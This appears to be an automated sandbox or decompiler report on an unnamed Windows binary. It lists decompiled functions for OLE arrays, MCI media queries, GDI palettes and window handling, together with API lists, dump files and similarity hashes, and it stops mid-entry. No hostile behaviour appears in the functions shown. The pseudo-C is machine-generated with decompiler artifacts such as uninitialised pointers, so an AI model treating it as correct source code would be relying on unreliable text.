                                                                                0x0040c4d0
                                                                                0x0040c4db
                                                                                0x0040c4dc
                                                                                0x0040c4e2
                                                                                0x0040c4e3
                                                                                0x0040c4e4
                                                                                0x0040c4eb
                                                                                0x0040c4ef
                                                                                0x0040c4ef
                                                                                0x0040c502
                                                                                0x0040c510

                                                                                APIs
                                                                                • VariantCopy.OLEAUT32(?), ref: 0040C394
                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040C3F9
                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040C41B
                                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040C45A
                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040C4C5
                                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040C4E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                • String ID:
                                                                                • API String ID: 351091851-0
                                                                                • Opcode ID: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                                • Instruction ID: e8cfbddb4b6d86e1814c4b1c7dcfa7253a557c948e887391303c1413b19c10f2
                                                                                • Opcode Fuzzy Hash: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                                • Instruction Fuzzy Hash: E6510D7590121DDBDB25DB59CD90BDAB3BCBB08304F4042EAEA09F7281D634AF858F64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0046A3B4, Relevance: 9.1, APIs: 6, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E0046A3B4(void* __eax) {
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				void* _v140;
				char _t53;
				char _t57;
				char _t61;
				char _t65;
				intOrPtr _t69;
				intOrPtr _t76;
				void* _t77;
				long _t79;
				long _t82;

				_t77 = __eax;
				_t79 = _t82;
				 *(__eax + 0x2e8) = 0x102;
				 *((intOrPtr*)(_t79 + 8)) = 8;
				mciSendCommandA( *(__eax + 0x2f2) & 0x0000ffff, 0x80b, 0x102, _t79);
				_t53 =  *((intOrPtr*)(_t79 + 4));
				 *((char*)(_t77 + 0x2e3)) = _t53;
				if(_t53 != 0) {
					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000004;
				}
				 *((intOrPtr*)(_t79 + 8)) = 1;
				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
				_t57 =  *((intOrPtr*)(_t79 + 4));
				 *((char*)(_t77 + 0x2e6)) = _t57;
				if(_t57 != 0) {
					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000008;
				}
				 *((intOrPtr*)(_t79 + 8)) = 7;
				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
				_t61 =  *((intOrPtr*)(_t79 + 4));
				 *((char*)(_t77 + 0x2e5)) = _t61;
				if(_t61 != 0) {
					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000002;
				}
				 *((intOrPtr*)(_t79 + 8)) = 3;
				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
				_t65 =  *((intOrPtr*)(_t79 + 4));
				 *((char*)(_t77 + 0x2e7)) = _t65;
				if(_t65 != 0) {
					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000010;
				}
				 *((intOrPtr*)(_t79 + 8)) = 4;
				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
				_t69 =  *((intOrPtr*)(_t79 + 4));
				if(_t69 == 0x207 || _t69 == 0x208 || _t69 == 0x203 || _t69 == 0x201) {
					 *((char*)(_t77 + 0x2e4)) = 1;
				}
				if( *((char*)(_t77 + 0x2e4)) != 0) {
					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000001;
				}
				 *(_t77 + 0x2e8) = 0x20000;
				 *((intOrPtr*)(_t77 + 0x304)) = mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x843, 0x20000,  &_v128);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)(_t77 + 0x310)) = _v116 - _v124;
				_t76 = _v112 - _v120;
				 *((intOrPtr*)(_t77 + 0x314)) = _t76;
				return _t76;
			}


















                                                                                0x0046a3ba
                                                                                0x0046a3bc
                                                                                0x0046a3c3
                                                                                0x0046a3c9
                                                                                0x0046a3df
                                                                                0x0046a3e4
                                                                                0x0046a3e7
                                                                                0x0046a3ef
                                                                                0x0046a3f1
                                                                                0x0046a3f1
                                                                                0x0046a3f8
                                                                                0x0046a414
                                                                                0x0046a419
                                                                                0x0046a41c
                                                                                0x0046a424
                                                                                0x0046a426
                                                                                0x0046a426
                                                                                0x0046a42d
                                                                                0x0046a449
                                                                                0x0046a44e
                                                                                0x0046a451
                                                                                0x0046a459
                                                                                0x0046a45b
                                                                                0x0046a45b
                                                                                0x0046a462
                                                                                0x0046a47e
                                                                                0x0046a483
                                                                                0x0046a486
                                                                                0x0046a48e
                                                                                0x0046a490
                                                                                0x0046a490
                                                                                0x0046a497
                                                                                0x0046a4b3
                                                                                0x0046a4b8
                                                                                0x0046a4c0
                                                                                0x0046a4d7
                                                                                0x0046a4d7
                                                                                0x0046a4e5
                                                                                0x0046a4e7
                                                                                0x0046a4e7
                                                                                0x0046a4f3
                                                                                0x0046a511
                                                                                0x0046a51f
                                                                                0x0046a520
                                                                                0x0046a521
                                                                                0x0046a522
                                                                                0x0046a52b
                                                                                0x0046a535
                                                                                0x0046a539
                                                                                0x0046a545

                                                                                APIs
                                                                                • mciSendCommandA.WINMM(?,0000080B,00000102), ref: 0046A3DF
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A414
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A449
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A47E
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A4B3
                                                                                • mciSendCommandA.WINMM(?,00000843,00020000,?), ref: 0046A50C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CommandSend
                                                                                • String ID:
                                                                                • API String ID: 3079401599-0
                                                                                • Opcode ID: fa762538808ecbf9c70f82dd65a79da2be8a886e74ae2368f223f3776803766a
                                                                                • Instruction ID: 9f3064282c2c23eb361a6cf1d432f5e155d01ea21818f742c5ad4657b8b276cc
                                                                                • Opcode Fuzzy Hash: fa762538808ecbf9c70f82dd65a79da2be8a886e74ae2368f223f3776803766a
                                                                                • Instruction Fuzzy Hash: 27419560444791AADB11CF54C8CDBA73BE8AF05304F0844BAFD9C9F287D7B99848CB66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00420BFC, Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 81%
                                                                                			E00420BFC(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int* _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				struct HDC__* _v44;
				signed int* _t36;
				signed int _t39;
				signed int _t42;
				signed int* _t52;
				signed int _t56;
				intOrPtr _t66;
				void* _t72;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t73 = _t74;
				_t75 = _t74 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t52 = _a8;
				_v24 = _v16 << 4;
				_v20 = E00408330(_v24, __eflags);
				 *[fs:edx] = _t75;
				_t56 = _v24;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:edx], 0x420ef3, _t73, __edi, __esi, __ebx, _t72);
				if(( *_t52 | _t52[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t52;
					_t36[1] = _t52[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_a4[1] = GetSystemMetrics(0xc);
				}
				_v44 = GetDC(0);
				if(_v44 == 0) {
					E004200C0(_t56);
				}
				_push(_t73);
				_push(0x420ce5);
				_push( *[fs:edx]);
				 *[fs:edx] = _t75;
				_t39 = GetDeviceCaps(_v44, 0xe);
				_t42 = _t39 * GetDeviceCaps(_v44, 0xc);
				if(_t42 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t42;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(E00420CEC);
				return ReleaseDC(0, _v44);
			}




















                                                                                0x00420bfd
                                                                                0x00420bff
                                                                                0x00420c05
                                                                                0x00420c08
                                                                                0x00420c0b
                                                                                0x00420c0e
                                                                                0x00420c17
                                                                                0x00420c22
                                                                                0x00420c30
                                                                                0x00420c36
                                                                                0x00420c3e
                                                                                0x00420c46
                                                                                0x00420c63
                                                                                0x00420c68
                                                                                0x00420c6d
                                                                                0x00420c48
                                                                                0x00420c52
                                                                                0x00420c5e
                                                                                0x00420c5e
                                                                                0x00420c77
                                                                                0x00420c7e
                                                                                0x00420c80
                                                                                0x00420c80
                                                                                0x00420c87
                                                                                0x00420c88
                                                                                0x00420c8d
                                                                                0x00420c90
                                                                                0x00420c99
                                                                                0x00420caf
                                                                                0x00420cb5
                                                                                0x00420cc7
                                                                                0x00420cc9
                                                                                0x00420cb7
                                                                                0x00420cb7
                                                                                0x00420cb7
                                                                                0x00420cce
                                                                                0x00420cd1
                                                                                0x00420cd4
                                                                                0x00420ce4

                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 00420C4A
                                                                                • GetSystemMetrics.USER32 ref: 00420C56
                                                                                • GetDC.USER32(00000000), ref: 00420C72
                                                                                • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00420C99
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00420CA6
                                                                                • ReleaseDC.USER32 ref: 00420CDF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CapsDeviceMetricsSystem$Release
                                                                                • String ID:
                                                                                • API String ID: 447804332-0
                                                                                • Opcode ID: e33d606845e976a746918d03a0318887393e3dad17af5a3bfb32981df972067d
                                                                                • Instruction ID: b5a1ea645670a87a40300d2b3d0004dea96dac25918e5ae6dc528da29662d6d6
                                                                                • Opcode Fuzzy Hash: e33d606845e976a746918d03a0318887393e3dad17af5a3bfb32981df972067d
                                                                                • Instruction Fuzzy Hash: 1F31A270B00204DFEB04DFA6D881AAEBBF5FF49310F50816AF414AB391C6789D40CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042106C, Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E0042106C(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HPALETTE__* _v12;
				struct HDC__* _v16;
				struct tagBITMAPINFO* _t36;
				intOrPtr _t43;
				struct HBITMAP__* _t47;
				void* _t50;

				_t36 = __ecx;
				_t47 = __eax;
				E00420F1C(__eax, _a4, __ecx);
				_v12 = 0;
				_v16 = CreateCompatibleDC(0);
				_push(_t50);
				_push(0x421109);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff4;
				if(__edx != 0) {
					_v12 = SelectPalette(_v16, __edx, 0);
					RealizePalette(_v16);
				}
				_v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
				_pop(_t43);
				 *[fs:eax] = _t43;
				_push(E00421110);
				if(_v12 != 0) {
					SelectPalette(_v16, _v12, 0);
				}
				return DeleteDC(_v16);
			}










                                                                                0x00421075
                                                                                0x00421079
                                                                                0x00421082
                                                                                0x00421089
                                                                                0x00421093
                                                                                0x00421098
                                                                                0x00421099
                                                                                0x0042109e
                                                                                0x004210a1
                                                                                0x004210a6
                                                                                0x004210b4
                                                                                0x004210bb
                                                                                0x004210bb
                                                                                0x004210d9
                                                                                0x004210df
                                                                                0x004210e2
                                                                                0x004210e5
                                                                                0x004210ee
                                                                                0x004210fa
                                                                                0x004210fa
                                                                                0x00421108

                                                                                APIs
                                                                                  • Part of subcall function 00420F1C: GetObjectA.GDI32(?,00000054), ref: 00420F30
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0042108E
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 004210AF
                                                                                • RealizePalette.GDI32(?), ref: 004210BB
                                                                                • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 004210D2
                                                                                • SelectPalette.GDI32(?,00000000,00000000), ref: 004210FA
                                                                                • DeleteDC.GDI32(?), ref: 00421103
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                                                • String ID:
                                                                                • API String ID: 1221726059-0
                                                                                • Opcode ID: e701bdbdbff6446c448e1e9e753bd8837e927accd3bded0621ef232a79ac0767
                                                                                • Instruction ID: 4c8e86a8e62bf8e843ce22e0fa3398f7087306fd2782e42c4131c5f231b58ff0
                                                                                • Opcode Fuzzy Hash: e701bdbdbff6446c448e1e9e753bd8837e927accd3bded0621ef232a79ac0767
                                                                                • Instruction Fuzzy Hash: E3118275B002187FDB10EBA9CC51F5EB7FCAB4D700F518466B514F7281D678A9108B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004324CC, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004324CC(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x46b8d0; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x46b8d0; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x46b8d0; // 0x0
				SetPropA(_a4,  *0x487b72 & 0x0000ffff, _t27);
				_t31 =  *0x46b8d0; // 0x0
				SetPropA(_a4,  *0x487b70 & 0x0000ffff, _t31);
				_t35 =  *0x46b8d0; // 0x0
				 *0x46b8d0 = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}










                                                                                0x004324d1
                                                                                0x004324d4
                                                                                0x004324dc
                                                                                0x004324e2
                                                                                0x004324f4
                                                                                0x00432509
                                                                                0x00432524
                                                                                0x00432524
                                                                                0x00432529
                                                                                0x0043253b
                                                                                0x00432540
                                                                                0x00432552
                                                                                0x00432563
                                                                                0x00432568
                                                                                0x00432578
                                                                                0x00432580

                                                                                APIs
                                                                                • SetWindowLongA.USER32 ref: 004324F4
                                                                                • GetWindowLongA.USER32 ref: 004324FF
                                                                                • GetWindowLongA.USER32 ref: 00432511
                                                                                • SetWindowLongA.USER32 ref: 00432524
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 0043253B
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 00432552
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: LongWindow$Prop
                                                                                • String ID:
                                                                                • API String ID: 3887896539-0
                                                                                • Opcode ID: 1d0c36f883103d76a0d62257e21793873c675a6b5b18f4571a362eb7fc807a2c
                                                                                • Instruction ID: 1d398ade87635050a55010048a09e70f80f05b49b1a79d506cad9994c015bbcd
                                                                                • Opcode Fuzzy Hash: 1d0c36f883103d76a0d62257e21793873c675a6b5b18f4571a362eb7fc807a2c
                                                                                • Instruction Fuzzy Hash: 1911EA75504249BFCB00EF99EC84D9A37ECFB08354F108226F914DB2A1D774EA408BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004208AC, Relevance: 9.1, APIs: 6, Instructions: 55windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004208AC(void* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				void* _t20;
				struct HDC__* _t25;
				void* _t28;
				void* _t31;
				struct HPALETTE__* _t33;
				LOGPALETTE* _t34;

				_t31 = __eax;
				_t33 = 0;
				_t34->palVersion = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E00402994(_t28, __ecx << 2,  &_v1036);
				} else {
					_t25 = CreateCompatibleDC(0);
					_t20 = SelectObject(_t25, _t31);
					_v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
					SelectObject(_t25, _t20);
					DeleteDC(_t25);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E00420814(_t34) == 0) {
						E004206A4( &_v1036, _v1038 & 0x0000ffff);
					}
					_t33 = CreatePalette(_t34);
				}
				return _t33;
			}













                                                                                0x004208b5
                                                                                0x004208b7
                                                                                0x004208b9
                                                                                0x004208c1
                                                                                0x004208fb
                                                                                0x00420909
                                                                                0x004208c3
                                                                                0x004208ca
                                                                                0x004208ce
                                                                                0x004208e7
                                                                                0x004208ee
                                                                                0x004208f4
                                                                                0x004208f4
                                                                                0x00420914
                                                                                0x0042091c
                                                                                0x00420932
                                                                                0x00420932
                                                                                0x0042093f
                                                                                0x0042093f
                                                                                0x0042094c

                                                                                APIs
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 004208C5
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004208CE
                                                                                • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,00424313,?,?,?,?,00422E1F), ref: 004208E2
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004208EE
                                                                                • DeleteDC.GDI32(00000000), ref: 004208F4
                                                                                • CreatePalette.GDI32 ref: 0042093A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                                                                • String ID:
                                                                                • API String ID: 2515223848-0
                                                                                • Opcode ID: 482c9c2788b0c37a5b9dfecb9249efeda884aeb6f599fa4f2b036e3790343ac4
                                                                                • Instruction ID: 325484a17df5b14f92a47423d6ed2c50f4fb832cdd6203f9564a378a98e35d35
                                                                                • Opcode Fuzzy Hash: 482c9c2788b0c37a5b9dfecb9249efeda884aeb6f599fa4f2b036e3790343ac4
                                                                                • Instruction Fuzzy Hash: D2019BA130432066E610776A9C47F6B71F88FC1714F41D82FF58AB72C3D57C8854835A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045AE60, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0045AE60(void* __eax) {
				struct tagRECT _v20;
				struct HWND__* _t18;
				void* _t29;
				RECT* _t30;

				_t29 = __eax;
				ValidateRect(E0043BD14(__eax), 0);
				InvalidateRect(E0043BD14(_t29), 0, 0xffffffff);
				GetClientRect(E0043BD14(_t29), _t30);
				_t18 = E0043BD14( *((intOrPtr*)(_t29 + 0x240)));
				MapWindowPoints(E0043BD14(_t29), _t18,  &_v20, 2);
				ValidateRect(E0043BD14( *((intOrPtr*)(_t29 + 0x240))), _t30);
				return InvalidateRect(E0043BD14( *((intOrPtr*)(_t29 + 0x240))),  &_v20, 0);
			}







                                                                                0x0045ae64
                                                                                0x0045ae70
                                                                                0x0045ae81
                                                                                0x0045ae8f
                                                                                0x0045aea1
                                                                                0x0045aeaf
                                                                                0x0045aec1
                                                                                0x0045aee2

                                                                                APIs
                                                                                • ValidateRect.USER32(00000000,00000000,0045B6B4), ref: 0045AE70
                                                                                • InvalidateRect.USER32(00000000,00000000,000000FF,00000000,00000000,0045B6B4), ref: 0045AE81
                                                                                • GetClientRect.USER32 ref: 0045AE8F
                                                                                • MapWindowPoints.USER32 ref: 0045AEAF
                                                                                • ValidateRect.USER32(00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000,0045B6B4), ref: 0045AEC1
                                                                                • InvalidateRect.USER32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000), ref: 0045AED9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Rect$InvalidateValidate$ClientPointsWindow
                                                                                • String ID:
                                                                                • API String ID: 2846033224-0
                                                                                • Opcode ID: 3c2b3297a28a6712cf709c30d3ef4196e5b5ec664aa24e26e9e8547ffadd32af
                                                                                • Instruction ID: b1e37b74211c5b0444d6c631685268bf9646e65aeb1a0234bab0008e2eca243a
                                                                                • Opcode Fuzzy Hash: 3c2b3297a28a6712cf709c30d3ef4196e5b5ec664aa24e26e9e8547ffadd32af
                                                                                • Instruction Fuzzy Hash: 9DF0B2A065430176DA40B6BACC87F4A229C9B4871CF10193E7629FB3C3DA3CE8144EF9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041FF90, Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0041FF90(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041F36C( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041F36C( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041F44C( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041E68C(E0041F330( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041E68C(E0041F330( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}




                                                                                0x0041ff91
                                                                                0x0041ff9c
                                                                                0x0041ffae
                                                                                0x0041ffbd
                                                                                0x0041fff7
                                                                                0x00420008
                                                                                0x0041ffbf
                                                                                0x0041ffd1
                                                                                0x0041ffe2
                                                                                0x0041ffe2

                                                                                APIs
                                                                                  • Part of subcall function 0041F36C: CreateBrushIndirect.GDI32(?), ref: 0041F416
                                                                                • UnrealizeObject.GDI32(00000000), ref: 0041FF9C
                                                                                • SelectObject.GDI32(?,00000000), ref: 0041FFAE
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041FFD1
                                                                                • SetBkMode.GDI32(?,00000002), ref: 0041FFDC
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041FFF7
                                                                                • SetBkMode.GDI32(?,00000001), ref: 00420002
                                                                                  • Part of subcall function 0041E68C: GetSysColor.USER32(?), ref: 0041E696
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                • String ID:
                                                                                • API String ID: 3527656728-0
                                                                                • Opcode ID: a24b23a3cf2ea92b505d84a07bd1098d24ab30b8c58cd20f8ff859496a66ffca
